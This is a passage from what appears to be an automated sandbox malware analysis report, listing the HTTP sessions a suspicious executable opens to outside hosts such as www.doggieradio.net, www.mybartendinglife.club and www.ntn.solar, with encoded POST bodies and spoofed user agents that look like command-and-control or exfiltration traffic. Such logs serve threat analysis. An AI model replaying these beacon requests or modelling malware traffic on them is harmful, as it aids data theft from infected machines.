                                                                                                                                                                19192.168.11.30498403.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:47.632370949 CEST1289OUTPOST /0r1y/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.doggieradio.net
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.doggieradio.net
                                                                                                                                                                Referer: http://www.doggieradio.net/0r1y/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 67 4b 67 54 63 39 33 34 5a 35 79 33 4f 6c 34 51 30 49 6d 66 56 61 57 30 76 6a 59 50 6e 65 57 38 64 6a 32 79 38 47 46 48 74 57 62 4a 77 6b 32 35 46 64 50 59 6f 71 4f 61 77 46 42 7a 31 4b 41 41 59 32 55 34 64 6d 4b 4b 58 6c 58 68 72 78 48 2f 34 31 78 43 4e 39 6e 67 78 71 37 75 55 32 36 30 79 74 70 30 69 58 6f 38 6b 68 42 53 5a 53 69 4f 50 4d 59 74 61 4e 37 6b 2f 42 7a 4a 35 44 4c 61 69 42 33 45 2f 41 36 61 63 78 79 62 6a 7a 47 59 79 62 4a 36 45 4d 68 6c 4e 38 50 56 5a 76 4c 4a 4f 32 52 74 65 74 72 31 45 6d 34 33 6f 58 33 53 2b 6b 41 6d 6f 6e 78 69 7a 6b 68 51 57 49 74 69 68 6b 46 56 6d 57 37 35 52 35 62 41 67 2b 61 42 61 31 45 45 62 62 52 37 71 48 72 64 4e 65 46 4a 44 4b 79 78 73 4b 2f 4d 42 6e 57 36 76 71 33 52 70 6b 65 2f 61 72 72 76 30 57 67 33 53 6f 58 38 4f 58 79 68 76 4b 39 4e 5a 47 44 78 7a 48 38 52 32 66 65 37 72 4a 44 4b 47 68 34 30 35 2b 42 7a 53 48 42 36 62 4f 59 73 71 2f 51 76 77 6b 38 72 67 43 6b 43 56 45 56 65 50 34 43 61 2f 54 73 76 59 34 6c 45 44 51 42 48 64 50 45 45 42 33 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=gKgTc934Z5y3Ol4Q0ImfVaW0vjYPneW8dj2y8GFHtWbJwk25FdPYoqOawFBz1KAAY2U4dmKKXlXhrxH/41xCN9ngxq7uU260ytp0iXo8khBSZSiOPMYtaN7k/BzJ5DLaiB3E/A6acxybjzGYybJ6EMhlN8PVZvLJO2Rtetr1Em43oX3S+kAmonxizkhQWItihkFVmW75R5bAg+aBa1EEbbR7qHrdNeFJDKyxsK/MBnW6vq3Rpke/arrv0Wg3SoX8OXyhvK9NZGDxzH8R2fe7rJDKGh405+BzSHB6bOYsq/Qvwk8rgCkCVEVeP4Ca/TsvY4lEDQBHdPEEB3EmIArvvYTr/AgayI1kI49mxF8fxxRA/9CKgEWLezXdTp5L8TjIpxXMuKzR8x0vqgQzekHKTi/dBYS2LHwQDnqBrpdRW7pyrKMP4jBxDRJZLC2qz5FSLmSi1mP4FIs/jy3S4RfNVR5niomohTJUx3mcg0DZPn7kAKUMel0DgG64OUGOgC1JL3ylgd2ebfNKuCSpIXHCw8ETq44ZYZ9TylvpId3AcDe4b2KW0KQ3LNBVH5qPrddDjXIj2AIW1jBhOo7lZ5Ojd0rH8OsflXJg+K8UnsF/XYjU8bfuky1FCzy/Lw/469+5ClukwSUkVgbRS7fDNvsSJkxIw53+RsRmVB96UlMjNGurV6woERzw7d2SciYuC3mzjBpM2Q7L/82j8rs9cqXUdK8YIkz0ps5fNbPGwR1H1D2LoJ7DVBmNFsamcsFndhBYuDxShXt77/Xwzey2hkVw0sS1sQH5fdUZ6rllmQrRSShjWNWObjRRJuHvs0faJMhRiEk/gIEbTh+9+WDMSm/DDneQy+StMNZWxof2
                                                                                                                                                                Oct 9, 2024 13:03:47.632419109 CEST2464OUTData Raw: 6c 2b 78 6c 4f 55 6f 47 39 30 57 59 6c 4d 45 48 58 74 36 33 32 73 69 52 41 32 47 51 61 76 50 39 6f 5a 46 4e 65 56 4c 74 6c 6d 48 50 2b 72 32 51 74 6d 6c 76 78 2f 41 78 71 57 62 4c 52 70 58 34 2f 6e 72 48 6e 66 69 49 6f 67 4e 63 30 75 53 54 77 4e
                                                                                                                                                                Data Ascii: l+xlOUoG90WYlMEHXt632siRA2GQavP9oZFNeVLtlmHP+r2Qtmlvx/AxqWbLRpX4/nrHnfiIogNc0uSTwNxvFKbhhruO8ixGYV0SFUNCSUkkPHlrECNW5JMTS0mQ5RpcIwCtj+3EGX+kK40Z/vBAuMsJ+gAbcsYrmJu0BWkGj4zMrNTdZyqjTRb4n1Ftno0gILSs62rDl0ku+Gomajs1tMkv5oYJnIc3zOi/yzJn5uVhEtnzRMC


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.11.30498413.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:50.267708063 CEST349OUTGET /0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.doggieradio.net
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:03:51.267218113 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:51 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 259
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 68 6c 3d 74 49 49 7a 66 4e 48 59 65 70 76 55 63 52 6b 39 74 72 57 46 62 71 2b 56 75 6a 39 41 2f 39 43 6b 52 6c 2b 50 2f 42 4e 45 78 52 76 57 37 32 75 7a 64 4a 57 4b 68 36 61 59 39 6e 74 71 77 4a 30 6e 4f 6c 34 77 4f 6c 48 75 51 79 36 32 6b 45 62 45 34 41 4e 69 41 4f 33 66 7a 6f 33 77 55 6b 65 45 34 37 45 6b 30 77 74 37 68 47 55 58 45 56 4f 66 64 76 6b 4d 4a 63 51 3d 26 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P"}</script></head></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.11.30498423.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:56.501013994 CEST634OUTPOST /sfkd/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.mybartendinglife.club
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.mybartendinglife.club
                                                                                                                                                                Referer: http://www.mybartendinglife.club/sfkd/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 33 64 6c 37 48 38 75 5a 45 56 63 33 4c 32 66 6f 42 6a 62 67 6e 50 79 6d 49 61 47 6b 4c 48 52 39 52 31 58 6b 50 34 48 5a 4f 6a 4e 71 6a 39 74 52 75 54 32 6a 78 74 38 65 6e 2b 32 64 57 2f 37 61 66 46 6b 67 70 35 55 69 59 74 74 79 77 70 6d 78 63 36 4b 64 31 33 52 31 4e 70 56 57 6a 4a 66 56 59 31 35 77 6f 33 68 79 74 75 45 52 67 2f 38 55 39 4d 7a 6f 6a 6d 32 30 31 39 52 6e 38 65 78 6c 34 4a 47 33 56 2b 37 33 76 42 55 49 4d 65 35 5a 4e 58 59 39 46 41 75 68 51 57 76 4e 2f 43 34 41 59 46 38 33 45 44 31 44 67 34 36 4b 73 68 47 2b 6c 65 47 6a 75 58 37 4f 45 41 63 63 66 54 69 69 5a 77 3d 3d
                                                                                                                                                                Data Ascii: nhl=3dl7H8uZEVc3L2foBjbgnPymIaGkLHR9R1XkP4HZOjNqj9tRuT2jxt8en+2dW/7afFkgp5UiYttywpmxc6Kd13R1NpVWjJfVY15wo3hytuERg/8U9Mzojm2019Rn8exl4JG3V+73vBUIMe5ZNXY9FAuhQWvN/C4AYF83ED1Dg46KshG+leGjuX7OEAccfTiiZw==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.11.30498433.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:59.144063950 CEST654OUTPOST /sfkd/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.mybartendinglife.club
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.mybartendinglife.club
                                                                                                                                                                Referer: http://www.mybartendinglife.club/sfkd/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 33 64 6c 37 48 38 75 5a 45 56 63 33 4b 54 58 6f 41 41 7a 67 68 76 79 70 46 4b 47 6b 53 33 52 35 52 31 4c 6b 50 35 43 43 4f 51 35 71 69 63 64 52 76 53 32 6a 69 64 38 65 76 65 32 59 62 66 37 64 66 46 6f 65 70 38 55 69 59 74 35 79 77 72 2b 78 63 74 32 65 36 48 52 4e 4c 70 56 51 73 70 66 56 59 31 35 77 6f 33 30 6c 74 76 73 52 68 50 73 55 38 75 62 72 72 47 32 37 69 4e 52 6e 75 75 77 4e 34 4a 47 65 56 38 50 64 76 45 51 49 4d 65 70 5a 4e 43 30 38 4f 41 75 6e 50 6d 76 61 35 68 42 49 42 45 67 45 44 51 56 49 73 6f 57 67 6b 57 33 6b 34 64 79 68 39 33 48 6a 59 42 78 30 64 52 6a 35 45 79 45 57 49 58 4d 5a 67 47 71 35 6a 4f 50 64 50 52 2b 4e 4a 52 67 3d
                                                                                                                                                                Data Ascii: nhl=3dl7H8uZEVc3KTXoAAzghvypFKGkS3R5R1LkP5CCOQ5qicdRvS2jid8eve2Ybf7dfFoep8UiYt5ywr+xct2e6HRNLpVQspfVY15wo30ltvsRhPsU8ubrrG27iNRnuuwN4JGeV8PdvEQIMepZNC08OAunPmva5hBIBEgEDQVIsoWgkW3k4dyh93HjYBx0dRj5EyEWIXMZgGq5jOPdPR+NJRg=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.11.30498443.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:01.785245895 CEST2578OUTPOST /sfkd/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.mybartendinglife.club
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.mybartendinglife.club
                                                                                                                                                                Referer: http://www.mybartendinglife.club/sfkd/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 33 64 6c 37 48 38 75 5a 45 56 63 33 4b 54 58 6f 41 41 7a 67 68 76 79 70 46 4b 47 6b 53 33 52 35 52 31 4c 6b 50 35 43 43 4f 51 68 71 6a 75 6c 52 75 78 4f 6a 68 64 38 65 6c 2b 32 5a 62 66 37 41 66 47 59 61 70 38 51 59 59 75 42 79 2f 75 71 78 4c 4a 69 65 74 58 52 4e 4a 70 56 56 6a 4a 66 41 59 31 70 30 6f 30 4d 6c 74 76 73 52 68 4b 6f 55 36 38 7a 72 74 47 32 30 31 39 52 72 38 65 78 67 34 49 75 6b 56 38 4c 6e 76 43 6b 49 4d 4e 68 5a 4d 77 73 38 4f 41 75 6e 58 57 76 5a 35 67 39 4a 42 45 4a 46 44 55 70 59 74 5a 79 67 67 43 76 38 72 74 2f 35 68 33 37 32 63 6c 74 50 56 77 54 4f 48 31 4e 33 47 30 56 68 70 54 53 43 6e 72 54 43 56 68 71 56 53 30 67 51 31 78 66 38 39 6c 76 69 49 4d 48 70 73 70 43 2f 2b 6b 64 67 63 6c 51 57 37 4b 51 52 76 78 45 75 64 4b 44 73 42 61 52 6c 75 66 65 73 73 4a 68 61 57 6d 32 64 43 37 32 62 6a 67 62 43 64 78 4b 2f 36 54 4c 6b 56 2b 2b 51 52 2f 54 78 6d 45 4c 76 76 49 6d 38 4c 70 43 39 54 63 73 62 72 75 63 41 6b 57 31 4c 64 68 32 59 44 6c 4d 5a 54 6e 4b 34 6b 6f 31 74 2f 35 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=3dl7H8uZEVc3KTXoAAzghvypFKGkS3R5R1LkP5CCOQhqjulRuxOjhd8el+2Zbf7AfGYap8QYYuBy/uqxLJietXRNJpVVjJfAY1p0o0MltvsRhKoU68zrtG2019Rr8exg4IukV8LnvCkIMNhZMws8OAunXWvZ5g9JBEJFDUpYtZyggCv8rt/5h372cltPVwTOH1N3G0VhpTSCnrTCVhqVS0gQ1xf89lviIMHpspC/+kdgclQW7KQRvxEudKDsBaRlufessJhaWm2dC72bjgbCdxK/6TLkV++QR/TxmELvvIm8LpC9TcsbrucAkW1Ldh2YDlMZTnK4ko1t/5x6q3CNIoSJ0ZSpnT+yAsk01l3S0DilHdPhaNqxsbq8eyJIyXV+MgdkGcIWH4rw8HGRdMuJdLzyLu5WaPErK5hEMP2N6+ESlHF+mxTFzXOCQATph56Vu2RtPOiCBA7EMj9G0PfcppZ+qbiw6bYrQL3q05IHpeBO1/Gup0b5Q7ns9bMEG9OwBKqXteUW1Wkk7NXKWzIHxVZLIdKkZqz5XPagy21aa2GZb1v+33beCjogJDO7TggzdGcSbc2scTRJrD5/1m+m2krfd0kGcaFmvBnLcuC9o+JivCPD7MjbWYVEbnLlD7DW9sEnh1Vamu3ZpHfNrMpu3N+kOR8um6Nd7mGt0G5DwHiLy3obwCaGxIReoydLadM6pbLzqWJsdGbz81KN3QMIOLf9U/Axu862jsYhy+6CWkQlLzwXk6p7MFC4jlAZmtlpIQ6DXT02kRSy9IafaNfffADzYLFLQVNafWjyBK683Lc2y7OV1gU7WBk+7QpVfR0UlY3jVMVoE0uEy8ZqhaI0WpL0/cDyXxj1FdgPLghN1eIoS1ZER9XMwXTGJeOHyDUF5WQ0mXOimjSs2HFLbjgHHXEkEkZaHIBjl7ChdAL8u/DRpzPeNgIEX/Imoz7fFwhFeIgyMy6jHwsCk+GbbQn9BpuKMv7kmQOPyHeRoKcxkDE+a9O2 [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:04:01.785267115 CEST1193OUTData Raw: 6d 48 78 6b 67 47 39 61 30 56 5a 6a 65 6c 37 4f 6e 47 62 5a 45 30 6c 36 32 72 70 46 58 61 56 6a 7a 30 44 74 6a 53 37 4a 2f 4f 4e 71 57 42 4c 56 62 4b 74 4e 41 52 2f 4a 6b 4b 51 4e 6e 31 4b 71 58 31 4f 32 37 36 51 41 4d 74 6d 74 49 74 6a 45 49 46
                                                                                                                                                                Data Ascii: mHxkgG9a0VZjel7OnGbZE0l62rpFXaVjz0DtjS7J/ONqWBLVbKtNAR/JkKQNn1KqX1O276QAMtmtItjEIFk6aFXakyvzRpV0TPoJiLOCd37AAkgeDpx7JmV575xKocf55gCXR1eyRdBUmg7jr1Ysp2stX4xGUHMDoLaG7npbQJcYsaMw5Apqib6CIsTnzswN4x7/vnLJ7Cj3TlE/PrSWiNXjOeAKaHxZBhAENqIn5ojXhZ0XXyM


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.11.30498453.33.130.190806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:04.420248985 CEST355OUTGET /sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.mybartendinglife.club
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:04:04.522494078 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:04 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 259
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 26 6e 68 6c 3d 36 66 4e 62 45 49 57 57 42 32 4a 4a 59 53 2f 78 65 79 33 57 70 76 4b 4a 41 76 79 56 4d 68 64 4b 41 41 6d 2b 64 34 6d 46 43 54 63 4e 76 38 35 4a 78 58 7a 54 33 76 49 35 6b 73 48 38 64 37 58 2b 66 46 4d 39 35 5a 77 6e 4c 34 52 67 37 4f 4b 7a 63 64 36 65 79 32 6c 38 42 61 6c 59 6f 34 7a 57 64 52 64 63 38 43 73 6a 6b 38 38 4d 2f 76 67 36 78 75 6a 31 39 55 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8="}</script></head></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.11.3049846199.59.243.227806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:09.755691051 CEST598OUTPOST /udtr/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.ntn.solar
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.ntn.solar
                                                                                                                                                                Referer: http://www.ntn.solar/udtr/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 69 37 66 78 32 65 59 6b 6c 4c 62 44 6c 57 51 6f 48 39 37 66 70 43 76 61 79 59 50 6f 4a 56 68 4b 6b 6e 31 37 71 33 46 30 52 46 65 70 51 6b 47 47 6f 70 73 49 65 41 6e 52 45 73 4f 49 48 7a 67 65 7a 61 58 4b 2f 74 57 6e 38 59 4e 77 53 43 2b 53 59 34 42 2b 48 79 69 31 4a 44 6d 56 48 78 2f 7a 38 45 61 6d 50 59 71 31 65 32 51 53 32 31 50 51 59 77 4d 44 36 30 63 74 31 62 2b 4f 2f 68 71 54 61 6a 33 55 58 6d 4a 6b 69 44 39 69 38 73 79 30 53 33 54 42 61 35 4a 44 30 43 48 73 75 38 5a 58 39 37 55 6b 6f 37 45 33 79 30 48 65 71 47 31 47 66 34 6b 65 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=EU5iPXn9SK7EVi7fx2eYklLbDlWQoH97fpCvayYPoJVhKkn17q3F0RFepQkGGopsIeAnREsOIHzgezaXK/tWn8YNwSC+SY4B+Hyi1JDmVHx/z8EamPYq1e2QS21PQYwMD60ct1b+O/hqTaj3UXmJkiD9i8sy0S3TBa5JD0CHsu8ZX97Uko7E3y0HeqG1Gf4keQ==
                                                                                                                                                                Oct 9, 2024 13:04:09.858261108 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                date: Wed, 09 Oct 2024 11:04:09 GMT
                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                content-length: 1106
                                                                                                                                                                x-request-id: 88b7572c-6f59-400c-a3e4-dc352f6e099f
                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
                                                                                                                                                                set-cookie: parking_session=88b7572c-6f59-400c-a3e4-dc352f6e099f; expires=Wed, 09 Oct 2024 11:19:09 GMT; path=/
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                Oct 9, 2024 13:04:09.858278990 CEST506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODhiNzU3MmMtNmY1OS00MDBjLWEzZTQtZGMzNTJmNmUwOTlmIiwicGFnZV90aW1lIjoxNzI4NDcxODQ5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.11.3049847199.59.243.227806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:12.385987997 CEST618OUTPOST /udtr/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.ntn.solar
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.ntn.solar
                                                                                                                                                                Referer: http://www.ntn.solar/udtr/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
